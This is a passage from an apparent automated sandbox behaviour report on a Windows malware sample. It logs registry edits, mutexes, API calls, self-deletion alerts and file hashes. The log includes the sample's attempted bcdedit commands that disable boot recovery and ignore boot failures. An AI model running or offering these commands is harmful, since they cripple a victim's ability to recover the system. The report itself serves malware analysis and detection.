  7522.    
  7523. \BaseNamedObjects\SHIMLIB_LOG_MUTEX
  7524.     1268         
  7525. API Call   
  7526.    
  7527.   API Name:  Sleep   Address:  0x0042232d
  7528.   Params:  [15]
  7529.   Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  kernel32.dll
  7530.     828      
  7531. Regkey 
  7532. Added
  7533.    
  7534. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Multimedia\Audio
  7535.     1268         
  7536. Regkey 
  7537. Added
  7538.    
  7539. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Multimedia\Audio Comp
  7540.    ression Manager\
  7541.     1268         
  7542. API Call   
  7543.    
  7544.   API Name:  Sleep   Address:  0x0042232d
  7545.   Params:  [15]
  7546.   Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  kernel32.dll
  7547.     828      
  7548. Regkey 
  7549. Added
  7550.    
  7551. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Multimedia\Audio Comp
  7552.    ression Manager\MSACM
  7553.     1268         
  7554. Regkey 
  7555. Added
  7556.    
  7557. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Multimedia\Audio Comp
  7558.    ression Manager\
  7559.     1268         
  7560. Regkey 
  7561. Added
  7562.    
  7563. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Multimedia\Audio Comp
  7564.    ression Manager\Priority v4.00
  7565.     1268         
  7566. API Call   
  7567.    
  7568.   API Name:  Sleep   Address:  0x0042232d
  7569.   Params:  [15]
  7570.   Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  kernel32.dll
  7571.     828      
  7572. Process
  7573. Terminated
  7574.    
  7575. C:\Documents and Settings\admin\Local Settings\Temp\73.exe
  7576.   Parentname:  C:\WINDOWS\explorer.exe
  7577.   Command Line:  N/A
  7578.     1240    2684     
  7579. File   
  7580. Failed
  7581.    
  7582. C:\Documents and Settings\admin\Application Data\CLBCATQ.DLL
  7583.     828      
  7584. File   
  7585. Failed
  7586.    
  7587. C:\Documents and Settings\admin\Application Data\COMRes.dll
  7588.     828      
  7589. API Call   
  7590.    
  7591.   API Name:  GetSystemDirectoryW   Address:  0x76fd7ee4
  7592.   Params:  [0x77043650, 261]
  7593.   Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  kernel32.dll
  7594.     828      
  7595. Mutex  
  7596.    
  7597. \BaseNamedObjects\AMResourceMutex2
  7598.     828      
  7599. Mutex  
  7600.    
  7601. \BaseNamedObjects\VideoRenderer
  7602.     828      
  7603. Regkey 
  7604. Queryvalue
  7605.    
  7606. \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
  7607.     1268         
  7608. API Call   
  7609.    
  7610.  API Name:  GetSystemDirectoryA   Address:  0x74723c7f
  7611.  Params:  [0xfcf568, 261]
  7612.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  kernel32.dll
  7613.     828      
  7614. API Call   
  7615.    
  7616.  API Name:  GetSystemDirectoryA   Address:  0x74723c7f
  7617.  Params:  [0xfcf570, 261]
  7618.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  kernel32.dll
  7619.     828      
  7620. Mutex  
  7621.    
  7622. \BaseNamedObjects\CTF.LBES.MutexDefaultS-1-5-21-1409082233-688789844-725345543-1003
  7623.     828      
  7624. Mutex  
  7625.    
  7626. \BaseNamedObjects\CTF.Compart.MutexDefaultS-1-5-21-1409082233-688789844-725345543-1003
  7627.     828      
  7628. Mutex  
  7629.    
  7630. \BaseNamedObjects\CTF.Asm.MutexDefaultS-1-5-21-1409082233-688789844-725345543-1003
  7631.     828      
  7632. Mutex  
  7633.    
  7634. \BaseNamedObjects\CTF.Layouts.MutexDefaultS-1-5-21-1409082233-688789844-725345543-1003
  7635.     828      
  7636. Mutex  
  7637.    
  7638. \BaseNamedObjects\CTF.TMD.MutexDefaultS-1-5-21-1409082233-688789844-725345543-1003
  7639.     828      
  7640. API Call   
  7641.    
  7642.  API Name:  GetSystemDirectoryA   Address:  0x74723c7f
  7643.  Params:  [0xfcf4bc, 261]
  7644.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  kernel32.dll
  7645.     828      
  7646. Mutex  
  7647.    
  7648. \BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-1409082233-688789844-725345543-1003MUTEX.Defau
  7649.   ltS-1-5-21-1409082233-688789844-725345543-1003
  7650.     828      
  7651. API Call   
  7652.    
  7653.  API Name:  SetWindowsHookExA   Address:  0x7473097c
  7654.  Params:  [2, 0x747307c3, 0x74720000, 856]
  7655.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  user32.dll
  7656.     828      
  7657. API Call   
  7658.    
  7659.  API Name:  SetWindowsHookExA   Address:  0x7473099a
  7660.  Params:  [7, 0x747304cd, 0x74720000, 856]
  7661.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  user32.dll
  7662.     828      
  7663. API Call   
  7664.    
  7665.  API Name:  GetSystemDirectoryW   Address:  0x763982be
  7666.  Params:  [0xfcef98, 260]
  7667.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  kernel32.dll
  7668.     828      
  7669. API Call   
  7670.    
  7671.  API Name:  GetSystemDirectoryW   Address:  0x763982be
  7672.  Params:  [0xfcf548, 260]
  7673.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  kernel32.dll
  7674.     828      
  7675. API Call   
  7676.    
  7677.  API Name:  GetSystemDirectoryA   Address:  0x755dd289
  7678.  Params:  [0xfceb8c, 261]
  7679.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  kernel32.dll
  7680.     828      
  7681. API Call   
  7682.    
  7683.  API Name:  GetSystemDirectoryA   Address:  0x755dd289
  7684.  Params:  [0xfcf630, 261]
  7685.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  kernel32.dll
  7686.     828      
  7687. API Call   
  7688.    
  7689.  API Name:  GetSystemDirectoryW   Address:  0x763982be
  7690.  Params:  [0xfcf1b8, 260]
  7691.  Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  kernel32.dll
  7692.     828      
  7693. File   
  7694. Failed
  7695.    
  7696. C:\Documents and Settings\admin\Application Data\MSVFW32.dll
  7697.     828      
  7698. File   
  7699. Delete
  7700.    
  7701. C:\Documents and Settings\admin\Local Settings\Temp\73.exe
  7702.  MD5:  446071be407efeb4e0d7c83bb504774a
  7703.  SHA1: ef06d2b504ce08b2d6570ca4b4f923a1ad428f7a
  7704.     1268        400384
  7705. Malicious  Alert   
  7706. Self  Delete
  7707.    
  7708. Message:   Self deletion using batch file    Detail:   Process deleting itself using a batch file  
  7709.              
  7710. Malicious  Alert   
  7711. Self  Delete
  7712.    
  7713. Message:   Root process deleted    Detail:   Process deleting itself  
  7714.              
  7715. Process
  7716. Terminated
  7717.    
  7718. C:\WINDOWS\system32\cmd.exe
  7719.  Parentname:  C:\DOCUME~1\admin\LOCALS~1\Temp\73.exe
  7720.  Command Line:  N/A
  7721.     1268    1240     
  7722. Regkey 
  7723. Added
  7724.    
  7725. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  7726.   n\Explorer\Shell Folders
  7727.     828      
  7728. Regkey 
  7729. Setval
  7730.    
  7731. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  7732.   n\Explorer\Shell Folders\"CD Burning" = C:\Documents and Settings\admin\Local Settings\Applicatio
  7733.    n Data\Microsoft\CD Burning
  7734.     828      
  7735. Regkey 
  7736. Added
  7737.    
  7738. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  7739.    n\Explorer\User Shell Folders
  7740.     828      
  7741. Folder 
  7742. Open
  7743.    
  7744. C:\Documents and Settings\admin\My Documents
  7745.     828      
  7746. Regkey 
  7747. Added
  7748.    
  7749. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  7750.    n\Explorer\Shell Folders
  7751.     828      
  7752. Regkey 
  7753. Setval
  7754.    
  7755. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  7756.    n\Explorer\Shell Folders\"Personal" = C:\Documents and Settings\admin\My Documents
  7757.     828      
  7758. Regkey 
  7759. Added
  7760.    
  7761. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  7762.   n\Explorer\User Shell Folders
  7763.     828      
  7764. Regkey 
  7765. Added
  7766.    
  7767. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  7768.   n\Explorer\Shell Folders
  7769.     828      
  7770. Regkey 
  7771. Setval
  7772.    
  7773. \REGISTRY\USER\S-1-5-21-1409082233-688789844-725345543-1003\Software\Microsoft\Windows\CurrentVersio
  7774.   n\Explorer\Shell Folders\"Desktop" = C:\Documents and Settings\admin\Desktop
  7775.     828      
  7776. Regkey 
  7777. Added
  7778.    
  7779. \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
  7780.     828      
  7781. Regkey 
  7782. Added
  7783.    
  7784. \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
  7785.     828      
  7786. Regkey 
  7787. Setval
  7788.    
  7789. \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"Common Desktop"
  7790.   = C:\Documents and Settings\All Users\Desktop
  7791.     828      
  7792. Regkey 
  7793. Added
  7794.    
  7795. \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
  7796.     828      
  7797. Regkey 
  7798. Setval
  7799.    
  7800. \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"Common AppData"
  7801.    = C:\Documents and Settings\All Users\Application Data
  7802.     828      
  7803. API Call   
  7804.    
  7805.   API Name:  NtAdjustPrivilegesToken   Address:  0x77ddf01a
  7806.   Params:  [SeDebugPrivilege, Enabled]
  7807.   Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  ntdll.dll
  7808.     828      
  7809. API Call   
  7810.    
  7811.   API Name:  GetTokenInformation   Address:  0x0041e934
  7812.   Params:  [0x1c4, 0x19]
  7813.   Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  advapi32.dll
  7814.     828      
  7815. API Call   
  7816.    
  7817.   API Name:  Sleep   Address:  0x0042232d
  7818.   Params:  [15]
  7819.   Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  kernel32.dll
  7820.     828      
  7821. API Call   
  7822.    
  7823.   API Name:  Sleep   Address:  0x0042232d
  7824.   Params:  [15]
  7825.   Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  kernel32.dll
  7826.     828      
  7827. 4 Repeated items skipped
  7828. Mutex  
  7829.    
  7830. \BaseNamedObjects\78456214324124
  7831.     828      
  7832. File   
  7833. Failed
  7834.    
  7835. C:\Documents and Settings\admin\Application Data\bcdedit.exe
  7836.     828      
  7837. File   
  7838. Failed
  7839.    
  7840. C:\DOCUME~1\admin\LOCALS~1\Temp\bcdedit.exe
  7841.     828      
  7842. File   
  7843. Failed
  7844.    
  7845. C:\WINDOWS\system32\bcdedit.exe
  7846.     828      
  7847. File   
  7848. Failed
  7849.    
  7850. C:\WINDOWS\system\bcdedit.exe
  7851.     828      
  7852. File   
  7853. Failed
  7854.    
  7855. C:\WINDOWS\bcdedit.exe
  7856.     828      
  7857. File   
  7858. Failed
  7859.    
  7860. C:\WINDOWS\system32\wbem\bcdedit.exe
  7861.     828      
  7862. File   
  7863. Failed
  7864.    
  7865. C:\Program Files\QuickTime\QTSystem\bcdedit.exe
  7866.     828      
  7867. File   
  7868. Failed
  7869.    
  7870. C:\WINDOWS\system32\WindowsPowerShell\v1.0\bcdedit.exe
  7871.     828      
  7872. File   
  7873. Failed
  7874.    
  7875. C:\Program Files\Debugging Tools for Windows (x86)\bcdedit.exe
  7876.     828      
  7877. File   
  7878. Failed
  7879.    
  7880. C:\Documents and Settings\admin\Application Data\BCDEDIT.EXE \SET.EXE
  7881.     828      
  7882. File   
  7883. Failed
  7884.    
  7885. C:\DOCUME~1\admin\LOCALS~1\Temp\bcdedit.exe \set.exe
  7886.     828      
  7887. File   
  7888. Failed
  7889.    
  7890. C:\WINDOWS\system32\BCDEDIT.EXE \SET.EXE
  7891.     828      
  7892. File   
  7893. Failed
  7894.    
  7895. C:\WINDOWS\system\BCDEDIT.EXE \SET.EXE
  7896.     828      
  7897. File   
  7898. Failed
  7899.    
  7900. C:\WINDOWS\BCDEDIT.EXE \SET.EXE
  7901.     828      
  7902. File   
  7903. Failed
  7904.    
  7905. C:\WINDOWS\system32\wbem\BCDEDIT.EXE \SET.EXE
  7906.     828      
  7907. File   
  7908. Failed
  7909.    
  7910. C:\Program Files\QuickTime\QTSystem\BCDEDIT.EXE \SET.EXE
  7911.     828      
  7912. File   
  7913. Failed
  7914.    
  7915. C:\WINDOWS\system32\WindowsPowerShell\v1.0\BCDEDIT.EXE \SET.EXE
  7916.     828      
  7917. File   
  7918. Failed
  7919.    
  7920. C:\Program Files\Debugging Tools for Windows (x86)\BCDEDIT.EXE \SET.EXE
  7921.     828      
  7922. File   
  7923. Failed
  7924.    
  7925. C:\Documents and Settings\admin\Application Data\BCDEDIT.EXE \SET {CURRENT}.EXE
  7926.     828      
  7927. File   
  7928. Failed
  7929.    
  7930. C:\DOCUME~1\admin\LOCALS~1\Temp\bcdedit.exe \set {current}.exe
  7931.     828      
  7932. File   
  7933. Failed
  7934.    
  7935. C:\WINDOWS\system32\BCDEDIT.EXE \SET {CURRENT}.EXE
  7936.     828      
  7937. File   
  7938. Failed
  7939.    
  7940. C:\WINDOWS\system\BCDEDIT.EXE \SET {CURRENT}.EXE
  7941.     828      
  7942. File   
  7943. Failed
  7944.    
  7945. C:\WINDOWS\BCDEDIT.EXE \SET {CURRENT}.EXE
  7946.     828      
  7947. File   
  7948. Failed
  7949.    
  7950. C:\WINDOWS\system32\wbem\BCDEDIT.EXE \SET {CURRENT}.EXE
  7951.     828      
  7952. File   
  7953. Failed
  7954.    
  7955. C:\Program Files\QuickTime\QTSystem\BCDEDIT.EXE \SET {CURRENT}.EXE
  7956.     828      
  7957. File   
  7958. Failed
  7959.    
  7960. C:\WINDOWS\system32\WindowsPowerShell\v1.0\BCDEDIT.EXE \SET {CURRENT}.EXE
  7961.     828      
  7962. File   
  7963. Failed
  7964.    
  7965. C:\Program Files\Debugging Tools for Windows (x86)\BCDEDIT.EXE \SET {CURRENT}.EXE
  7966.     828      
  7967. File   
  7968. Failed
  7969.    
  7970. C:\Documents and Settings\admin\Application Data\BCDEDIT.EXE \SET {CURRENT} BOOTEMS.EXE
  7971.     828      
  7972. File   
  7973. Failed
  7974.    
  7975. C:\DOCUME~1\admin\LOCALS~1\Temp\bcdedit.exe \set {current} bootems.exe
  7976.     828      
  7977. File   
  7978. Failed
  7979.    
  7980. C:\WINDOWS\system32\BCDEDIT.EXE \SET {CURRENT} BOOTEMS.EXE
  7981.     828      
  7982. File   
  7983. Failed
  7984.    
  7985. C:\WINDOWS\system\BCDEDIT.EXE \SET {CURRENT} BOOTEMS.EXE
  7986.     828      
  7987. File   
  7988. Failed
  7989.    
  7990. C:\WINDOWS\BCDEDIT.EXE \SET {CURRENT} BOOTEMS.EXE
  7991.     828      
  7992. File   
  7993. Failed
  7994.    
  7995. C:\WINDOWS\system32\wbem\BCDEDIT.EXE \SET {CURRENT} BOOTEMS.EXE
  7996.     828      
  7997. File   
  7998. Failed
  7999.    
  8000. C:\Program Files\QuickTime\QTSystem\BCDEDIT.EXE \SET {CURRENT} BOOTEMS.EXE
  8001.     828      
  8002. File   
  8003. Failed
  8004.    
  8005. C:\WINDOWS\system32\WindowsPowerShell\v1.0\BCDEDIT.EXE \SET {CURRENT} BOOTEMS.EXE
  8006.     828      
  8007. File   
  8008. Failed
  8009.    
  8010. C:\Program Files\Debugging Tools for Windows (x86)\BCDEDIT.EXE \SET {CURRENT} BOOTEMS.EXE
  8011.     828      
  8012. File   
  8013. Failed
  8014.    
  8015. C:\Documents and Settings\admin\Application Data\BCDEDIT.EXE \SET {CURRENT} BOOTEMS OFF.EXE
  8016.     828      
  8017. File   
  8018. Failed
  8019.    
  8020. C:\DOCUME~1\admin\LOCALS~1\Temp\bcdedit.exe \set {current} bootems off.exe
  8021.     828      
  8022. File   
  8023. Failed
  8024.    
  8025. C:\WINDOWS\system32\BCDEDIT.EXE \SET {CURRENT} BOOTEMS OFF.EXE
  8026.     828      
  8027. File   
  8028. Failed
  8029.    
  8030. C:\WINDOWS\system\BCDEDIT.EXE \SET {CURRENT} BOOTEMS OFF.EXE
  8031.     828      
  8032. File   
  8033. Failed
  8034.    
  8035. C:\WINDOWS\BCDEDIT.EXE \SET {CURRENT} BOOTEMS OFF.EXE
  8036.     828      
  8037. File   
  8038. Failed
  8039.    
  8040. C:\WINDOWS\system32\wbem\BCDEDIT.EXE \SET {CURRENT} BOOTEMS OFF.EXE
  8041.     828      
  8042. File   
  8043. Failed
  8044.    
  8045. C:\Program Files\QuickTime\QTSystem\BCDEDIT.EXE \SET {CURRENT} BOOTEMS OFF.EXE
  8046.     828      
  8047. File   
  8048. Failed
  8049.    
  8050. C:\WINDOWS\system32\WindowsPowerShell\v1.0\BCDEDIT.EXE \SET {CURRENT} BOOTEMS OFF.EXE
  8051.     828      
  8052. File   
  8053. Failed
  8054.    
  8055. C:\Program Files\Debugging Tools for Windows (x86)\BCDEDIT.EXE \SET {CURRENT} BOOTEMS OFF.EXE
  8056.     828      
  8057. API Call   
  8058.    
  8059.   API Name:  ProcessCreate_Failure   Address:  0x7c81d627
  8060.   Params:  [NULL, bcdedit.exe /set {current} bootems off, 32, NULL]
  8061.   Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  dummy.dll
  8062.     828      
  8063. API Call   
  8064.    
  8065.   API Name:  Sleep   Address:  0x0041df48
  8066.   Params:  [1000]
  8067.   Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  kernel32.dll
  8068.     828      
  8069. File   
  8070. Failed
  8071.    
  8072. C:\Documents and Settings\admin\Application Data\BCDEDIT.EXE \SET {CURRENT} ADVANCEDOPTIONS.EXE
  8073.     828      
  8074. File   
  8075. Failed
  8076.    
  8077. C:\DOCUME~1\admin\LOCALS~1\Temp\bcdedit.exe \set {current} advancedoptions.exe
  8078.     828      
  8079. File   
  8080. Failed
  8081.    
  8082. C:\WINDOWS\system32\BCDEDIT.EXE \SET {CURRENT} ADVANCEDOPTIONS.EXE
  8083.     828      
  8084. File   
  8085. Failed
  8086.    
  8087. C:\WINDOWS\system\BCDEDIT.EXE \SET {CURRENT} ADVANCEDOPTIONS.EXE
  8088.     828      
  8089. File   
  8090. Failed
  8091.    
  8092. C:\WINDOWS\BCDEDIT.EXE \SET {CURRENT} ADVANCEDOPTIONS.EXE
  8093.     828      
  8094. File   
  8095. Failed
  8096.    
  8097. C:\WINDOWS\system32\wbem\BCDEDIT.EXE \SET {CURRENT} ADVANCEDOPTIONS.EXE
  8098.     828      
  8099. File   
  8100. Failed
  8101.    
  8102. C:\Program Files\QuickTime\QTSystem\BCDEDIT.EXE \SET {CURRENT} ADVANCEDOPTIONS.EXE
  8103.     828      
  8104. File   
  8105. Failed
  8106.    
  8107. C:\WINDOWS\system32\WindowsPowerShell\v1.0\BCDEDIT.EXE \SET {CURRENT} ADVANCEDOPTIONS.EXE
  8108.     828      
  8109. File   
  8110. Failed
  8111.    
  8112. C:\Program Files\Debugging Tools for Windows (x86)\BCDEDIT.EXE \SET {CURRENT} ADVANCEDOPTIONS.EXE
  8113.     828      
  8114. File   
  8115. Failed
  8116.    
  8117. C:\Documents and Settings\admin\Application Data\BCDEDIT.EXE \SET {CURRENT} ADVANCEDOPTIONS OFF.EXE
  8118.     828      
  8119. File   
  8120. Failed
  8121.    
  8122. C:\DOCUME~1\admin\LOCALS~1\Temp\bcdedit.exe \set {current} advancedoptions off.exe
  8123.     828      
  8124. File   
  8125. Failed
  8126.    
  8127. C:\WINDOWS\system32\BCDEDIT.EXE \SET {CURRENT} ADVANCEDOPTIONS OFF.EXE
  8128.     828      
  8129. File   
  8130. Failed
  8131.    
  8132. C:\WINDOWS\system\BCDEDIT.EXE \SET {CURRENT} ADVANCEDOPTIONS OFF.EXE
  8133.     828      
  8134. File   
  8135. Failed
  8136.    
  8137. C:\WINDOWS\BCDEDIT.EXE \SET {CURRENT} ADVANCEDOPTIONS OFF.EXE
  8138.     828      
  8139. File   
  8140. Failed
  8141.    
  8142. C:\WINDOWS\system32\wbem\BCDEDIT.EXE \SET {CURRENT} ADVANCEDOPTIONS OFF.EXE
  8143.     828      
  8144. File   
  8145. Failed
  8146.    
  8147. C:\Program Files\QuickTime\QTSystem\BCDEDIT.EXE \SET {CURRENT} ADVANCEDOPTIONS OFF.EXE
  8148.     828      
  8149. File   
  8150. Failed
  8151.    
  8152. C:\WINDOWS\system32\WindowsPowerShell\v1.0\BCDEDIT.EXE \SET {CURRENT} ADVANCEDOPTIONS OFF.EXE
  8153.     828      
  8154. File   
  8155. Failed
  8156.    
  8157. C:\Program Files\Debugging Tools for Windows (x86)\BCDEDIT.EXE \SET {CURRENT} ADVANCEDOPTIONS OFF.EX
  8158.    E
  8159.     828      
  8160. API Call   
  8161.    
  8162.   API Name:  ProcessCreate_Failure   Address:  0x7c81d627
  8163.   Params:  [NULL, bcdedit.exe /set {current} advancedoptions off, 32, NULL]
  8164.   Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  dummy.dll
  8165.     828      
  8166. API Call   
  8167.    
  8168.   API Name:  Sleep   Address:  0x0041df48
  8169.   Params:  [1000]
  8170.   Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  kernel32.dll
  8171.     828      
  8172. File   
  8173. Failed
  8174.    
  8175. C:\Documents and Settings\admin\Application Data\BCDEDIT.EXE \SET {CURRENT} OPTIONSEDIT.EXE
  8176.     828      
  8177. File   
  8178. Failed
  8179.    
  8180. C:\DOCUME~1\admin\LOCALS~1\Temp\bcdedit.exe \set {current} optionsedit.exe
  8181.     828      
  8182. File   
  8183. Failed
  8184.    
  8185. C:\WINDOWS\system32\BCDEDIT.EXE \SET {CURRENT} OPTIONSEDIT.EXE
  8186.     828      
  8187. File   
  8188. Failed
  8189.    
  8190. C:\WINDOWS\system\BCDEDIT.EXE \SET {CURRENT} OPTIONSEDIT.EXE
  8191.     828      
  8192. File   
  8193. Failed
  8194.    
  8195. C:\WINDOWS\BCDEDIT.EXE \SET {CURRENT} OPTIONSEDIT.EXE
  8196.     828      
  8197. File   
  8198. Failed
  8199.    
  8200. C:\WINDOWS\system32\wbem\BCDEDIT.EXE \SET {CURRENT} OPTIONSEDIT.EXE
  8201.     828      
  8202. File   
  8203. Failed
  8204.    
  8205. C:\Program Files\QuickTime\QTSystem\BCDEDIT.EXE \SET {CURRENT} OPTIONSEDIT.EXE
  8206.     828      
  8207. File   
  8208. Failed
  8209.    
  8210. C:\WINDOWS\system32\WindowsPowerShell\v1.0\BCDEDIT.EXE \SET {CURRENT} OPTIONSEDIT.EXE
  8211.     828      
  8212. File   
  8213. Failed
  8214.    
  8215. C:\Program Files\Debugging Tools for Windows (x86)\BCDEDIT.EXE \SET {CURRENT} OPTIONSEDIT.EXE
  8216.     828      
  8217. File   
  8218. Failed
  8219.    
  8220. C:\Documents and Settings\admin\Application Data\BCDEDIT.EXE \SET {CURRENT} OPTIONSEDIT OFF.EXE
  8221.     828      
  8222. File   
  8223. Failed
  8224.    
  8225. C:\DOCUME~1\admin\LOCALS~1\Temp\bcdedit.exe \set {current} optionsedit off.exe
  8226.     828      
  8227. File   
  8228. Failed
  8229.    
  8230. C:\WINDOWS\system32\BCDEDIT.EXE \SET {CURRENT} OPTIONSEDIT OFF.EXE
  8231.     828      
  8232. File   
  8233. Failed
  8234.    
  8235. C:\WINDOWS\system\BCDEDIT.EXE \SET {CURRENT} OPTIONSEDIT OFF.EXE
  8236.     828      
  8237. File   
  8238. Failed
  8239.    
  8240. C:\WINDOWS\BCDEDIT.EXE \SET {CURRENT} OPTIONSEDIT OFF.EXE
  8241.     828      
  8242. File   
  8243. Failed
  8244.    
  8245. C:\WINDOWS\system32\wbem\BCDEDIT.EXE \SET {CURRENT} OPTIONSEDIT OFF.EXE
  8246.     828      
  8247. File   
  8248. Failed
  8249.    
  8250. C:\Program Files\QuickTime\QTSystem\BCDEDIT.EXE \SET {CURRENT} OPTIONSEDIT OFF.EXE
  8251.     828      
  8252. File   
  8253. Failed
  8254.    
  8255. C:\WINDOWS\system32\WindowsPowerShell\v1.0\BCDEDIT.EXE \SET {CURRENT} OPTIONSEDIT OFF.EXE
  8256.     828      
  8257. File   
  8258. Failed
  8259.    
  8260. C:\Program Files\Debugging Tools for Windows (x86)\BCDEDIT.EXE \SET {CURRENT} OPTIONSEDIT OFF.EXE
  8261.     828      
  8262. API Call   
  8263.    
  8264.   API Name:  ProcessCreate_Failure   Address:  0x7c81d627
  8265.   Params:  [NULL, bcdedit.exe /set {current} optionsedit off, 32, NULL]
  8266.   Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  dummy.dll
  8267.     828      
  8268. API Call   
  8269.    
  8270.   API Name:  Sleep   Address:  0x0041df48
  8271.   Params:  [1000]
  8272.   Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  kernel32.dll
  8273.     828      
  8274. API Call   
  8275.    
  8276.   API Name:  ProcessCreate_Failure   Address:  0x7c81d627
  8277.   Params:  [NULL, bcdedit.exe /set {current} bootstatuspolicy Ignore
  8278.    AllFailures, 32, NULL]
  8279.   Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  dummy.dll
  8280.     828      
  8281. File   
  8282. Failed
  8283.    
  8284. C:\Documents and Settings\admin\Application Data\BCDEDIT.EXE \SET {CURRENT} BOOTSTATUSPOLICY.EXE
  8285.     828      
  8286. File   
  8287. Failed
  8288.    
  8289. C:\DOCUME~1\admin\LOCALS~1\Temp\bcdedit.exe \set {current} bootstatuspolicy.exe
  8290.     828      
  8291. File   
  8292. Failed
  8293.    
  8294. C:\WINDOWS\system32\BCDEDIT.EXE \SET {CURRENT} BOOTSTATUSPOLICY.EXE
  8295.     828      
  8296. File   
  8297. Failed
  8298.    
  8299. C:\WINDOWS\system\BCDEDIT.EXE \SET {CURRENT} BOOTSTATUSPOLICY.EXE
  8300.     828      
  8301. File   
  8302. Failed
  8303.    
  8304. C:\WINDOWS\BCDEDIT.EXE \SET {CURRENT} BOOTSTATUSPOLICY.EXE
  8305.     828      
  8306. File   
  8307. Failed
  8308.    
  8309. C:\WINDOWS\system32\wbem\BCDEDIT.EXE \SET {CURRENT} BOOTSTATUSPOLICY.EXE
  8310.     828      
  8311. API Call   
  8312.    
  8313.   API Name:  Sleep   Address:  0x0041df48
  8314.   Params:  [1000]
  8315.   Imagepath:  C:\Documents and Settings\admin\Application Data\ignmy-a.exe   DLL Name:  kernel32.dll
  8316.     828      
  8317. File   
  8318. Failed
  8319.    
  8320. C:\Program Files\QuickTime\QTSystem\BCDEDIT.EXE \SET {CURRENT} BOOTSTATUSPOLICY.EXE
  8321.     828      
  8322. File   
  8323. Failed
  8324.    
  8325. C:\WINDOWS\system32\WindowsPowerShell\v1.0\BCDEDIT.EXE \SET {CURRENT} BOOTSTATUSPOLICY.EXE
  8326.     828      
  8327. File   
  8328. Failed
  8329.    
  8330. C:\Program Files\Debugging Tools for Windows (x86)\BCDEDIT.EXE \SET {CURRENT} BOOTSTATUSPOLICY.EXE
  8331.     828      
  8332. File   
  8333. Failed
  8334.    
  8335. C:\Documents and Settings\admin\Application Data\BCDEDIT.EXE \SET {CURRENT} BOOTSTATUSPOLICY IGNOREA
  8336.    LLFAILURES.EXE
  8337.     828      
  8338. File   
  8339. Failed
  8340.    
  8341. C:\DOCUME~1\admin\LOCALS~1\Temp\bcdedit.exe \set {current} bootstatuspolicy IgnoreAllFailures.exe
  8342.     828      
  8343. File   
  8344. Failed
  8345.    
  8346. C:\WINDOWS\system32\BCDEDIT.EXE \SET {CURRENT} BOOTSTATUSPOLICY IGNOREALLFAILURES.EXE
  8347.     828      
  8348. File   
  8349. Failed
  8350.    
  8351. C:\WINDOWS\system\BCDEDIT.EXE \SET {CURRENT} BOOTSTATUSPOLICY IGNOREALLFAILURES.EXE
  8352.     828      
  8353. File   
  8354. Failed
  8355.    
  8356. C:\WINDOWS\BCDEDIT.EXE \SET {CURRENT} BOOTSTATUSPOLICY IGNOREALLFAILURES.EXE
  8357.     828      
  8358. File   
  8359. Failed
  8360.    
